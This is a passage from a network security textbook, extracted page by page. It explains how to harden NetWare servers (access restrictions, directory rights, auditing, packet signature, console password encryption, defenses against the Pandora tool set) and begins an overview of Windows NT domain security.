accounts to use a \n12-character password in order to make these high-level accounts more difficult to crack. \nLogin Time Restrictions \nThe Login Time Restrictions screen allows the system administrator to define when a particular user is allowed to \nauthenticate to the NDS tree. Restrictions can be set by the time of day and/or day of the week. \nNote \nNDS does not account for holidays. \nFor example, in Figure 13.3 the system administrator has limited when the user Comodus can gain access to \nnetwork resources. Comodus is only allowed to log on from 7:00 AM to 6:00 PM Monday through Friday and from \n8:00 AM to noon on Saturdays. During any other time period, Comodus will not be allowed to log on to the system. \nIf he is already authenticated when the time period expires, he will receive a five-minute warning and then be \ndisconnected from the system. \n \nFigure 13.3: The Login Time Restrictions screen \nTime restrictions are an excellent way to kick users off a system before running a backup. A user who remains \nlogged on to the system may also have files open. Backup programs are typically unable to back up open files \nbecause they need exclusive access to the file information in order to insure a proper backup. By using time \nrestrictions, you can disconnect your users from the network before launching your backup program. \nNetwork Address Restriction \nThe Network Address Restriction button allows the NDS administrator to identify which systems a user may use \nwhen authenticating with the NDS tree. As shown in Figure 13.4, the administrator is allowed to restrict a user by \nmultiple network protocols. This can insure that users are only allowed to gain access to network resources from \ntheir assigned workstations. \n" }, { "page_number": 261, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 261\n \nFigure 13.4: The Network Address Restriction screen \nFor example, let’s say that you have an application that runs on a dedicated system and needs access to certain \nfiles on the server. Let’s also assume that you would like to have this one account log on without a password, so \nthat if the system is power cycled it will immediately be able to gain access to network resources without waiting \nat the password prompt. \nAn account without a password is obviously a security hazard. You can, however, take precautions to insure that \nthis account remains relatively secure. By defining a network address restriction for this account that only allows a \nlogon to be performed from this dedicated system, the account will remain secure— provided that the workstation \nremains physically secure. This prevents someone from using the account to log on from another location on the \nnetwork. \nIntruder Lockout \nThe Intruder Lockout button displays a screen that shows statistics regarding failed logon attempts. The system \nadministrator is allowed to view whether the account has been locked out due to too many incorrect password \nattempts. The administrator can also see how many bad password attempts took place, as well as the host address \nof the system used. This is extremely valuable information if you are attempting to track an intruder. \nNote \nFailed logon attempts can also be recorded to the audit log. \nEven if an account does not become locked, the Intruder Lockout screen displays the number of failed attempts, as \nwell as the amount of time left before the failure count is set to zero. \nRights to Files and Directories \nThe Rights to Files and Directories button allows the NDS administrator to view all file and directory permissions \nassigned to a particular user. This is a powerful tool that allows an administrator to review all of a user’s assigned \nfile access rights in one graphical display. This is in contrast to Windows NT Explorer, where an administrator \nwould be required to check every directory, on every server, one at a time. \nThe Rights to Files and Directories screen is shown in Figure 13.5. The top window displays the server volumes \nwhere access has been granted. The center window displays the directories on this volume where the user has been \ngranted access. Finally, the bottom of the screen shows the specific rights that have been granted to this user for \nthe highlighted directory. A description of each of the NetWare directory rights is shown in Table 13.1. \n" }, { "page_number": 262, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 262\n \nFigure 13.5: The Rights to Files and Directories screen \nTable 13.1: Directory Rights \nRight \nDescription \nSupervisor \nProvides a combination of all other access rights \nRead \nAllows a user to view the contents of or execute a file \nWrite \nAllows a user to view and modify the contents of a file \nCreate \nAllows a user to create new files or salvage files that have \nbeen deleted \nErase \nAllows a user to delete or overwrite a file \nModify \nAllows a user to rename a file or change its attributes \nFile Scan \nAllows a user to view the contents of a directory without \nbeing able to view the contents of any of the files saved \nwithin it \nAccess Control \nAllows a user to change trustee assignments and grant \naccess rights to other users \nNote \nAssigning only the Create right would allow users to copy files to a directory but not view \nor modify those files once they get there. \nWarning \nThe Supervisor and the Access Control rights are the ones you need to be \nthe most careful with. The Supervisor right not only assigns full permissions, \nbut it cannot be filtered out from subdirectories. The Access Control right \nallows a user to grant permissions that he himself does not even have. \nLet’s say you gave the user Charlie File Scan and Access Control rights to a specific directory. Charlie could then \nuse the Access Control right to grant Roscoe Read, Write, and Erase rights to this directory—even though Charlie \ndoes not have these permissions himself. In fact, Charlie could grant Roscoe the Access Control right so that \nRoscoe could then turn around and give Charlie a full set of permissions. The only exception is the Supervisor \nright, which can only be granted by an administrator equivalent. \nGroup Membership \nThe Group Membership button allows you to define which groups this user is a member of. Since access rights \ncan be assigned to groups, it is usually easier to assign permissions to each group first, then add the users who \nneed this level of access as members. For example, the Sales group could be assigned access to all directories \ncontaining sales-related information. Now when you create new users, you simply have to add them to the Sales \ngroup rather than assigning specific access rights to each required directory. \nTip \nIf a user is associated with any groups, you will need to review the group’s rights in order to \nget a full picture of the file areas a user has access to. \n" }, { "page_number": 263, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 263\nSecurity Equal To \nThe Security Equal To button allows you to view and configure all access rights that have been inherited from \nanother user or group. This screen gives the NDS administrator a central location where all security equivalencies \ncan be viewed. \nFor example, it is a common practice to make all support staff security equivalent to the NDS Admin. This gives \nthe support staff full control of all NDS objects. While Admin equivalency needs to be reviewed on a per-user \nbasis, having support staff use a different account from the administrator account is an excellent practice. Doing so \nprovides accountability within the audit logs. If all support personnel are using the Admin account to make \nchanges, you have no traceability. By giving support staff their own accounts, you are able to go back through the \nlogs in order to see who has made specific changes. \nYou should provide support personnel with two accounts: one for making administrative-level changes and the \nother for performing daily activities. It is far too easy for an administrator to become lax when working on a \nsystem. Unfortunately, this laxity can lead to mistakes. Users who have full system access can inadvertently cause \nmajor damage (“I deleted all files on the F: drive? Isn’t it F for Floppy?\"). \nBy using an alternative account for performing administrative functions, the support person has an opportunity to \nwake up and focus a little more closely on the task at hand. After completing the required task, support personnel \ncan log back off and use their regular user accounts. \nFile System \nAs you saw in the last section, most file system access is controlled through nwadmn95. This is to insure that the \nNDS administrator can quickly identify the access rights that have been granted to each user. NetWare does, \nhowever, provide an additional utility called Filer, which allows the administrator to control the flow of access \nrights recursively through directories. The flow of access rights is controlled using the inherited rights mask. \nInherited Rights Mask \nFile system access can be tuned down to the file level. Normally, file access rights trickle down through \ndirectories. This means that if a user is given read access to directories at a certain level, that user will also have \nread access to any subsequent subdirectories. NetWare provides an inherited rights mask that allows these rights to \nbe masked out so that they will not trickle down to included subdirectories. This allows the system administrator \nto assign the precise rights required at any directory level. \nFor example, examine the directory structure in Figure 13.6. We have a directory named Shared located off the \nroot of the CAM_SYS volume. Within the Shared directory are a number of subdirectories that have been broken \nup by department. We wish to grant users the File Scan right within the Shared directory in order to allow them to \nsee any subdirectories they have access to. We do not, however, want to grant users File Scan rights to all of the \nsubsequent subdirectories located under Shared. \n \nFigure 13.6: An example directory structure \nBy default, any user who is granted File Scan rights to the Shared directory will automatically receive File Scan \nrights to the Sales and Marketing directories. This is where the inherited rights mask becomes useful: it allows you \nto prevent the File Scan right from trickling down to each subdirectory. By filtering out the File Scan right, you \ncan prevent users from seeing what files are located in any directory for which they have not explicitly been \ngranted permissions. \nTo create an inherited rights mask, right-click on the directory within ConsoleOne, select Properties, then the \nInherited Rights Filter tab of the Properties window as seen in Figure 13.7. \n" }, { "page_number": 264, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 264\n \nFigure 13.7: Navigating directories with Filer \nIf you wished to prevent the File Scan right from passing through from the Shared to the Sales directory, you \nwould remove the File Scan right from the Sales directory’s inherited rights filter. \nNote \nSince you have prevented the File Scan right from propagating down any subdirectories, \nyou will need to specifically assign this right to all users whom you wish to be able to see \nfiles within this directory. \nThe inherited rights mask allows you to overcome the propagation of access rights through a subdirectory \nstructure. While propagation is usually desired, there are times when the administrator needs more granular control \nin order to specifically assign access rights to every directory. The inherited rights mask gives the administrator \nthis ability. \nLogging and Auditing \nThere are several types of log that can be generated with NetWare server. Of most interest for security is the \nconsole log, which is created with the utility console.nlm. This utility can create a log that records all console \nactivity and error messages. The second type of log is the audit log. This log is created using the Auditcon utility. \nNote \nA log of all ABENDS is kept in abend.log in the SYSTEM directory on a NetWare server. \nThis log can be useful in determining if a hacker is attempting a DoS (Denial of Service) \nattack by forcing your system to crash. \nAuditcon \nNetWare includes Auditcon, Novell’s system auditing utility. Auditcon allows the system administrator, or \nsomeone designated by the system administrator, to monitor server events. Events range from user logons to \npassword changes to specific file access. Over 70 events can be monitored. The benefit of Auditcon’s being a \nseparate utility from nwadmn95 is that the administrator can designate a regular user to monitor events. \nTip \nAuditcon is an excellent solution for large organizations where the person administering the \nnetwork is not the same person who is monitoring security. An auditor can be designated to \nmonitor system events without being given any other type of administration privilege. \nBy launching Auditcon and selecting Audit Directory Services, you are allowed to audit the tree based on specific \nevents or a user’s logon name. Figure 13.8 shows the configuration screen for selecting which NDS events you \nwish to monitor. For example, you could create a log entry every time a new member is added to a group or \nwhenever the security equivalency for an object is changed. \n" }, { "page_number": 265, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 265\n \nFigure 13.8: The Auditcon Audit by DS Events screen \nThe ability to track a specific user is also very important. For example, you may want to log all activities \nperformed by your administrator-level accounts. This can help you to identify when access privileges are being \nabused or when a high-level account has been compromised. \nUsing Auditcon, you can even choose to audit specific file system activities. For example, in Figure 13.9 we have \nenabled auditing of directory deletions. You could choose to track directory deletions for a specific user or \nglobally for everyone. \n \nFigure 13.9: Auditcon allows you to audit specific file events. \nTip \nTracking file system activities can be extremely useful when you wish to document \nimproper access to sensitive files. \n \nNetwork Security \nNetWare includes a number of methods for securing network communications. Packet signature provides a secure \nmethod for communicating with a NetWare server, while the Filtcfg utility allows the system administrator to \nperform basic packet filtering. Starting with NetWare 5.0, Novell has included additional technologies including \nPublic Key Infrastructure Service (PKIS), the integration of LDAP and SSL into NDS, the Novell International \nCryptographic Infrastructure (NICI), and the Novell Modular Authentication Service (NMAS). \nPacket Signature \nThere is a type of system attack, which has been around for a number of years, known as connection hijacking. \nConnection hijacking is when someone on the network sends information to a server and pretends that the data is \nactually coming from an administrator who is currently logged in. This allows the attacker to send commands to \nthe server that the server will accept, thinking they are coming from the system administrator. \nPacket signature is useful in deterring this type of attack. Packet signature requires both the server and the \nworkstation to sign each frame using a shared secret prior to transmission. The signature is determined \ndynamically and changes from frame to frame. The server will only accept commands from a station that is \nproperly signing frames. \nIn practice, if an attacker sends commands to the server pretending to be the administrator, the server will reject \nand log all frames received without a valid signature. Since the correct signature is changing constantly, it is \n" }, { "page_number": 266, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 266\nextremely difficult for an attacker to determine what to use for a signature. This feature helps to protect an \nadministrator’s connection during daily maintenance. \nNote \nPacket signature can also be enabled for all users. \nSetting Packet Signature \nPacket signature can be configured to four different security levels. These settings must be configured on both the \nworkstation and the server. Table 13.2 describes each of the available packet signature levels. \nTable 13.2: Packet Signature Levels \nSignature Level \nDescription \n0 \nDo not use packet signature. \n1 \nUse packet signature only if the remote system requires it. \n2 \nUse packet signature if the remote system supports it, but \nsigning is not required. \n3 \nDo not communicate with remote systems that do not support \npacket signature. \nBy default, NetWare clients and servers are configured to use a packet signature level of 1 (sign only when \nrequired). This means that in environments where the default settings have not been changed, packet signature is \nnot being used. \nThe Nomad Mobile Research Centre (NMRC) has discovered a spoofing vulnerability with packet signature \nsimilar to NT’s C2MYAZZ. The exploit allows an attacker to fool a workstation and a server into not using packet \nsignature. This exploit is effective at every signature level except for 3. Needless to say, you should insure that all \nworkstations used by your network administrators have a packet signature level of three. \nNote \nThe NMRC has documented a number of vulnerabilities with Novell products. You can \naccess its Web site at www.nmrc.org. \nSet packet signature to level three on the server by entering the following at the console \nSET NCP Packet Signature Option=3 \nSet packet signature on the client to level three by right-clicking on the small red N in the System Tray (assuming \nthe client is Windows-based) and selecting Novell Client Properties, then Advanced Settings, then Signature \nLevel, and finally 3. \nFiltcfg \nThe Filtcfg utility allows a NetWare server to act as a static packet filter. You can use packet filtering to control \ntraffic flowing to and from the server. If you have installed two or more network cards, you can also control traffic \nbetween different network segments. Filtcfg supports the filtering of IP, IPX, and AppleTalk traffic. \nIn order to filter traffic, you must enable filtering support through the Inetcfg utility for each protocol you wish to \nfilter. Once you have enabled support, you can initialize the Filtcfg utility by loading it at the server console. This \nproduces the Filter Configuration menu screen shown in Figure 13.10. From this screen you can choose the \nprotocol you wish to filter. \n" }, { "page_number": 267, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 267\n \nFigure 13.10: The Filter Configuration menu \nIf you select the TCP/IP option, you are first prompted to identify any routing protocols you wish to filter. You are \nalso prompted for the direction of the filter. For example, you can choose to filter out certain outgoing or incoming \nRIP updates. The difference is whether you want the server itself to receive these routing updates. An incoming \nfilter will drop the update before it is received by the server. An outgoing filter will allow the route to be \npropagated to the server itself, but the server will not propagate the route information through any of its other \nnetwork cards. \nIn addition to filtering routing information, you can also perform static packet filtering. The Packet Forwarding \nFilters screen is shown in Figure 13.11. Filtcfg provides two methods of defining packet filters. You can specify \nthe packets you wish to permit (the default setting), or you can specify the packets you wish to deny. In either \ncase, you are allowed to define exceptions. \n \nFigure 13.11: The Packet Forwarding Filters screen \nFor example, you could choose to configure the packets you wish to permit and specify that all traffic be allowed \nbetween the subnets 192.168.1.0 and 192.168.2.0. You could also define an exception that globally denies FTP \nconnection requests in both directions. The combination of filters allows the system administrator to create a very \ncomplex access control policy. \nIf you highlight the Filters option in the Packet Forwarding Filters screen and press Enter, you are presented with a \nlist of currently installed filters. Pressing the Insert key allows you to configure additional filter rules. The Define \nFilter screen is shown in Figure 13.12. \nThe Source Interface option lets you associate a filter rule with a specific network card. This is useful when you \nwish to define spoofing filters. For example, let’s assume that you have an internal network address of \n192.168.1.0, which is connected to the NetWare server via a 3COM card. Let’s also assume that you have an SMC \ncard that connects to a demilitarized zone. In order to prevent spoofed packets, you could define a filter rule \nstating that all traffic received by the SMC interface with an IP source address of 192.168.1.0 should be dropped. \n" }, { "page_number": 268, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 268\n \nFigure 13.12: The Define Filter screen \nYou can also define the source and destination IP address, the destination interface, and the type of IP packet. \nHighlighting the Packet Type field and pressing Enter produces the screen shown in Figure 13.13. This is a list of \npredefined IP packet types that you can use for creating your filter rules. If you need to filter a service that is not \nlisted, simply press the Insert key to define a new packet type. \n \nFigure 13.13: Defined TCP/IP Packet Types screen \nThere are a number of limitations when defining your packet filters: \nƒ \nYou cannot distinguish between acknowledgment (ACK=1) and session establishment \n(SYN=1) packets. \nƒ \nYou cannot define ICMP type codes. \nƒ \nYou cannot define support for services that use dynamic port assignments such as RPC. \nNote \nObviously, these limitations make Filtcfg a poor choice for securing an Internet \nconnection. Filtcfg’s modest packet-filtering ability may be sufficient, however, for \nproviding security between internal network segments. \nOnce you have defined your filter rules, press the Escape key to exit and save (I know—it’s a NetWare thing). \nYou must now reinitialize the system in order to have your filter policy take effect. \nPublic Key Infrastructure Service (PKIS) \nNovell uses PKIS to request, manage, and store certificates and key pairs in NDS. It also creates an Organizational \nCA (Certificate Authority) specific to a particular NDS tree (and hence, specific to your organization). Several \nother network security services rely on PKI, including Novell Secure Authentication Service, SSL, and Novell \nLDAP Services. As a result, NetWare Servers can use authentication and encryption to accept secure logins, verify \nLDAP requests (remember that LDAP is designed to allow third parties to query a given directory—in this case \nNDS), and encrypt network communications. \nSeveral components make up Novell PKI, including PKI.NLM (on the NetWare server), PKI_SERVER.DLL (on \nNT servers), LIBPKISERVEc.S and NPKI (for Sun Solaris servers), and ConsoleOne—the administrative tool for \nPKI. After installing PKI some of the administrative tasks will be: \n" }, { "page_number": 269, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 269\nCreate an Organizational CA. This consists of a public and private key, along with the \ncertificate, certificate chain (chain of authority) and other configuration information. The private \nkey is encrypted and stored in NDS, and Organizational CA is represented as an object stored in the \nSecurity container of NDS. \nCreate a Server Certificate object. Multiple Server Certificates can be stored on a single server. \nA PKI-aware application can be configured to use any of the Server Certificates available on that \nserver. \nRequest a public key certificate. At a minimum, public keys hold a public key, a subject and \nissuer name, a period of validity (the security world’s equivalent of freshness dating), a serial \nnumber, and a certificate authority’s digital signature \nNovell Modular Authentication Service (NMAS) \nNMAS is designed to incorporate additional authentication technology into Novell’s already robust security \nsystem. NMAS defines three key components, although the last (graded authentication) is really a combination of \nthe first two: login factors, login methods and sequences, and graded authentication. \nLogin Factors \nLogin factors are really unique areas that can be used to authenticate a user. Consider a password; this login factor \nis really something that you “know.” How about a smart card? This is something you “have.” And biometrics? \nThat’s right—something you “are.” Let’s look at how NMAS uses all three: \nPassword Authentication There are actually several technologies to support passwords. The following three \nchoices allow an administrator to choose a method that best integrates with existing administrative polices or other \nimplemented technologies. \nNDS passwords Username and password information is encrypted before being sent over the wire, \nwhich results in a reduction of speed and an increase in processor load, but is considered the most \nsecure option. \nClear-text Username and password information is sent “in the clear”—in other words, without \nencryption. This option is available for low-security access (such as an e-mail password) as defined \nby the administrator. \nSHA1/MD5 This technology hashes, or summarizes, information in such a way that the data is \naltered before being sent across the network, and yet remains relatively easy to compute. This \noption is considered moderately secure. \nPhysical Authentication Like our password technologies, there are multiple methods of verifying the physical \npresence of a user. Again, the technology that you choose will depend on many factors, including policies and \nexisting infrastructure (and, of course, cost). \nSmart card This plastic card (the general shape of a credit card, but slightly thicker) contains a \nmicrochip that can be programmed to store identification information (including digital certificates). \nToken Typically hand-held, tokens are devices that generate a unique password every time they are \nused (called a “one-time” password). Tokens typically rely on one of two mechanisms: \n" }, { "page_number": 270, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 270\nƒ \nChallenge-response After a user provides a correct username and password, \nthe server sends a random number to the token. The token returns an encrypted \nversion of the number, utilizing the user’s encryption keys stored in the token. \nThe server, which also has a copy of the user’s encryption keys, encrypts the \nrandom number itself with those keys, and then compares the results. If they \nmatch, the user is authenticated. \nTime-synchronous The token and server share an algorithm that generates a common \nnumber at specific intervals. After the user successfully provides a username and \npassword, the server prompts for the number displayed at that moment on the token. \nWhen the server verifies the expected number for that time interval, the user is \nauthenticated. \nBiometric Authentication Biometric authentication systems use measurable biological traits to identify and \nauthenticate. Systems consist of some type of sensor, along with the software to identify match points—those \nareas of the data that are unique and specific to any given individual. By requiring multiple match points, \nbiometric systems use an overwhelming statistical proof to authenticate a user. Biometric authentication is \ngrouped into two categories: \nStatic These systems capture characteristics that don’t change over time. Examples include \nretinas, fingerprints, and facial features. \nDynamic These systems focus on biological behaviors as opposed to set characteristics. \nExamples include voice or handwriting patterns. \nMethods and Sequences \nA login method is an implemented login factor. A login sequence is one or more login methods in a specific \nsequence. Because of the variety of login methods and sequences, NMAS supports graded authentication, which \ncontrols access to network resources based on the login method used by a particular user. NMAS provides eight \npredefined groupings of methods and sequences known as security clearance labels: \nƒ \nBiometric, Password, and Token \nƒ \nBiometric and Password \nƒ \nBiometric and Token \nƒ \nPassword and Token \nƒ \nBiometric \nƒ \nPassword \nƒ \nToken \nƒ \nLogged In (provides network access without using an NMAS method) \nAdministrators assign these labels to NetWare volumes (partitions). When a user has authenticated using NMAS, \nshe is said to have a session clearance. If a user has the same clearance level as that of the label of a partition, she \ncan access that partition (to the degree that she has NDS and file system partitions to the volume). If a user has a \nlower clearance level than that applied to the volume, she has no access. \nBy providing authentication methods and sequences beyond a simple password, NMAS strengthens the access \ncontrol already inherent in NetWare and gives an administrator a powerful and flexible platform for controlling \naccess to resources. \n" }, { "page_number": 271, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 271\n \nTweaking NetWare Security \nNovell provides some security tweaks that allow you to enhance the security of your server even further. These \ninclude the SECURE.NCF script, as well as a number of console parameter settings. \nThe SECURE.NCF Script \nNetWare includes a script called SECURE.NCF. When run during server startup, it automatically enables many of \nNetWare’s security features, thus enhancing the security of the server. The SECURE.NCF script performs the \nfollowing: \nƒ \nDisables support for unencrypted passwords \nƒ \nDisables the ability to access auditing functions using a general password \nƒ \nEnables the ability to automatically repair bad volumes during startup \nƒ \nRejects bad NCP packets \nAll of these settings are required if you need to insure that your system meets C2 trusted network specifications. If \nyou are not required to meet C2 standards, you can optionally comment out any setting that you do not wish to \nuse. \nSecure Console \nWhen run from the server console, the Secure Console command provides the following security features: \nƒ \nOnly allows the server to load software which is located in the SYS:SYSTEM directory \nƒ \nDisables the console debugging utility \nƒ \nPrevents the time and date from being changed by anyone but the console operator \nOnce the Secure Console command has been invoked, it cannot be disabled without rebooting the server. The \nsecure console features are designed to help protect the server from attacks at the server console. \nTip \nIn order to improve security even further, use the Lock Server Console option included with \nthe Monitor utility. \nSecuring Remote Console Access \nNetWare can be configured to allow you to remotely access the server console from any network workstation. \nAccess is provided via the Rconsole utilities or any generic telnet program. There are a number of known security \nissues involved when enabling remote console access. The details of these vulnerabilities are described in the \nsections that follow. \nSecuring the Console Password \nIn NetWare versions 3.2 and earlier, the console password was included in the AUTOEXEC.NCF in a clear text \nformat. This meant that anyone who could gain read access to the file would have been able to see the console \npassword. The syntax used was \nload remote secretpass \nwhere secretpass is the password used to gain access to the server console. As of NetWare versions 4.1x and \nhigher, remote access can be administered from the Inetcfg utility. By selecting Manage Configuration ¾ \nConfigure Remote Access from the Inetcfg main menu, you can define your remote access parameters, including \nthe remote console password. \nThe problem with Inetcfg is that it saves the password information in clear text to the file SYS:ETC\\Netinfo.cfg. \nThis is extremely bad: if you are running any of the IP services such as Web or NFS, users are provided Read \naccess to this directory. This means that any valid system user could potentially gain access to the server console. \nClearly, some method of encrypting the console password is required. To encrypt the console password, issue the \nfollowing commands from the server console: \nload remote \nremote encrypt \n" }, { "page_number": 272, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 272\nAs shown in Figure 13.14, this will create the file SYS:SYSTEM\\LDREMOTE.NCF, which contains an encrypted \nversion of your password string. The -E switch tells the remote program that the password has been saved in an \nencrypted format. \nYou now have a number of options. You can \nƒ \nRun the LDREMOTE.NCF file prior to running the INITSYS.NCF script within the \nAUTOEXEC.NCF file. \nƒ \nCopy and paste the full command into your AUTOEXEC.NCF file. \nƒ \nCopy and paste the -E switch, as well as the encrypted password, into the Remote \nAccess Password field of the Inetcfg utility. \n \nFigure 13.14: Encrypting the remote console password \nTip \nThe choice is yours, but it is probably best to use the LDREMOTE.NCF script. This will \nsave the encrypted password to the SYS:SYSTEM\\ directory and keep Inetcfg from \nimporting the commands. \nAccessing the Console Using Telnet \nAlthough NetWare allows you to use telnet to access the server console, this does not mean doing so is a good \nidea. The biggest problem with enabling telnet support to the server is that telnet sessions are not logged. Unlike \nan Rconsole connection, which generates an entry within the system log, telnet is capable of quietly connecting to \nthe server without leaving a trace. \nThe other problem with using telnet is that authentication with the server uses clear text passwords. This means \nthat even if you go to all the trouble of encrypting the console password, telnet transmits the password in clear \ntext, so that anyone with a packet sniffer may read it. \nWarning \nThe Inetcfg utility allows you to selectively enable Rconsole and/or telnet support. It \nis highly advised that you leave telnet support disabled. \nThe Pandora Factor \nThe most successful attack strategy on NetWare servers is known as Pandora. More an ongoing project and tool \nset as opposed to coordinated attack, Pandora exploits weaknesses in NDS and NetWare Packet Signature in an \nattempt to gain access to the entire NDS system, not just a sole server. \nNote \nLike most hacker tools, Pandora is a very useful group of tools for legitimate \nadministrators who want to test their own security, especially the strength of user \npasswords. Visit Pandora at www.nmrc.org/pandora/index.html \nDefense against Pandora includes some simple actions: \nƒ \nPandora only effectively works with passwords up to 16 characters. Passwords with 17 \ncharacters or more aren’t affected by (the current version) of Pandora. Ensure that your \nadmin password is at least 17 characters long. \nƒ \nSome of the Pandora tools rely on access to the SYSTEM directory of a NetWare server. \nVerify that only admin has rights to this directory. \nƒ \nBecause Pandora uses sniffing, keeping all administrative workstations on a separate, \nswitched segment will protect them from any sniffing attack. \nƒ \nConfigure all administrative workstations (and servers) to use packet level 3. \n" }, { "page_number": 273, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 273\n \nSummary \nIn this chapter we looked at how to secure a NetWare server environment. NetWare provides \na fairly secure environment right out of the box, but there are always a few tweaks you can do \nto make your networking environment even more secure. To this end, we discussed account \nmanagement, file access rights, and how to perform NDS audits. We even discussed why it is \nso important to secure the remote console password. \nIn the next chapter, we will take a look at Windows NT and how to secure an NT server \nenvironment. \n \n \nChapter 14: NT and Windows 2000 \nWindows NT Server has proven to be one of the most popular client-server platforms in existence. \nWindows 2000 is the next version of Microsoft’s flagship operating system, and it includes some \nsignificant security improvements that, coupled with its ease of use and well-known heritage, \nprovides a powerful (and complex) environment for enforcing security. \nThe default security posture of an NT server is pretty loose. Windows 2000 is, in some ways, more \nsecure in its default configuration, but still includes some weaknesses. There are a number of \nprocedures you can follow in order to increase security over the default configuration for both \nsystems. We will start with a brief overview of the NT operating system and then jump right into \nhow you can operate a more secure NT environment. We’ll follow with a comparison between NT \nand 2000, and talk about 2000’s unique security requirements. \nNT Overview \nThe core operating system of NT Server is 32-bit. While this creates some backward-\ncompatibility problems with 16-bit Windows applications, it helps to ensure that the OS \nkernel remains stable. NT is both multitasking and multithreaded. This helps to prevent any \nsingle process from monopolizing all available CPU time. \nNT Server uses the same Windows-32 application programming interface as NT workstation \nand Windows 95 and 98. This ensures a familiar programming environment that, in theory, \nallows a programmer to write a more stable application. For example, a programmer who is \nfamiliar with writing Windows Desktop applications will find programming for NT Server very \nsimilar as both use the Win32 interface. This is in contrast to the NetWare Loadable Module \n(NLM) technology used by a NetWare server. A programmer writing code for a NetWare \nserver must be specifically aware of the NLM programming environment. \nBecause the server uses the same Win32 interface as a Windows workstation, most Desktop \napplications are supported. This can be a real money saver for small environments that \ncannot afford to dedicate a system to server activities. Unlike NetWare, which requires you to \ndedicate a system as a server, NT Server can perform double duty as a user workstation, as \nwell. Server support for Win32 can also be a real time saver for the system administrator. This \nis because most of the tools that you are used to running from a desktop machine will run \nfrom the server, as well. \nNote \nUnfortunately, NT is missing the remote control features of NetWare’s Rconsole \nor UNIX’s telnet (a telnet server is included with Windows 2000 Server). While \nthere are tools available from Microsoft’s Web site and from its Resource Kits to \nmanage some server functions remotely, you cannot directly add or remove \nprotocols, launch applications, or access the NT Server Desktop from a remote \nworkstation. Third-party software is required to provide this functionality. \nNT uses a database known as the Registry in order to save most of the system’s configuration \ninformation. This can be information regarding user accounts, services, or even system device \ndrivers. Related information is said to be stored under the same hive. For example, the hive \nHKEY_USERS is used to store information regarding user accounts. Fields within a hive that \nhold configuration values are known as keys. \n" }, { "page_number": 274, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 274\nThe benefit of the Registry is that information is stored in a central location, simplifying the \nprocess of finding and changing information. While most of NT’s settings can be changed \nthrough the graphical interface, many settings must be manually changed in the Registry. The \ntool used for viewing and changing Registry information is known as regedt32. \nOut of the box, NT Server provides support for up to four processors. With hardware support, \nthis can be increased to 32. The benefit of additional processors is that more CPU time can be \nmade available to applications running on the server. \nVirtual Memory \nNT Server supports memory isolation of all applications running on the system. It also \nsupports the use of virtual memory. Virtual memory allows the server to utilize more \nmemory space than is physically installed in the system. The benefit is that \napplications are free to use more memory to add features. The drawback is that \nvirtual memory is stored to disk, which has a slower access time than physical \nmemory by a factor of 100. \nIt is important to understand that you take a performance hit once you start using a lot \nof virtual memory. It is true that you can follow Microsoft’s minimum memory \nrecommendations by installing 32MB of RAM in a server offering basic file, print, \nHTTP, WINS, and DHCP services. You may even get the system to boot up and \nfunction. Performance on this system would be absolutely dismal, however. For a \nsystem with this or a similar configuration, plan on installing at least 96MB–128MB of \nphysical memory. \n \nWarning \nBecause the Registry contains a majority of the system’s configuration \ninformation, you should be extremely careful when making changes. Never edit \nthe Registry without first creating an emergency recovery disk, and never make \nchanges without first understanding the effects of the change. \n \nNT Domain Structure \nNT Server uses the Windows NT Directory services for user and group management. This is not, as the name \nimplies, a fully hierarchical directory service like NetWare’s NDS. It is a flat security structure based upon the use \nof domains. Active Directory, the replacement to NT directory services in Windows 2000 remedies this problem \nby allowing a Windows environment to be managed in a hierarchical structure. \nA domain is a group of workstations and servers associated by a single security policy. A user can perform a \nsingle logon and gain access to every server within the domain; there is no need to perform separate logons for \neach server. \nStoring Domain Information \nDomain information is stored on domain controllers. Each domain has a single Primary Domain Controller (PDC). \nThe PDC contains the master record of all domain information. Any other NT Server can be set up as a Backup \nDomain Controller (BDC). The BDC receives updates from the PDC, so there is a backup copy of the domain \ninformation. A user who logs in can authenticate with the PDC or any one of the BDCs. \nThis brings a bit of a server-centric dependency to the whole domain model. For example, if the PDC contains a \nlogon script to connect users to network resources, a copy of this logon script must be provided on each BDC. If \nthe logon script on the PDC is changed, the change must be synchronized with each of the BDC servers. The copy \nof the script on the BDC servers will not be updated automatically. \nTip \nDo not use the logon script to try to implement a portion of your security policy. This is \nbecause all users have the ability to press Ctrl+C and break out of the logon script at any \ntime. \nDomain Trusts \nTo try to emulate a hierarchical structure, domains can be configured to be trusting. When a domain trusts another \ndomain, it allows users of that trusted domain to retain the same level of access they have in the trusted domain. \nFor example, Domain A trusts Domain B. This means that everyone who has domain user rights to Domain B \n" }, { "page_number": 275, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 275\n(trusted domain) can be permitted access to resources on Domain A (trusting domain). However, since Domain B \ndoes not trust Domain A, users in Domain A have no access rights within Domain B. Trusts can be configured to \nbe unidirectional (one domain trusts another) or bi-directional (each domains trusts the other equally). A \nunidirectional trust is referred to as a one-way trust, and a bi-directional trust is referred to as a two-way trust. \nWhile domain trusts are fine for a small environment, this model does not scale very well. For example, you \ncannot administer each domain from a single interface. You must systematically connect to each domain you wish \nto work with, one at a time. The other problem is, what if you have a few users who require access to multiple \ndomains? With NetWare, you can simply create an alias object in each container where you wish the user to have \naccess. With NT Server, this is not possible without creating multiple trust relationships, even if you only need to \naccommodate a small group of users. \nFinally, you cannot check your trust relationships from a central location. You must go to each primary server in \neach domain to see what trust relationships have been set up. If it is a large environment, you may have to put pen \nto paper in order to fully document all of the trust relationships. This is in contrast to NetWare, where a simple \nscan of the NDS tree will identify who has access and where. \nDesigning a Trust Architecture \nTrusts can be used to enhance security, but the number one rule is to keep it simple. Try to limit the number of \ntrust relationships to only one or two. This will help to ensure that you do not create a web of trust relationships. It \nwill 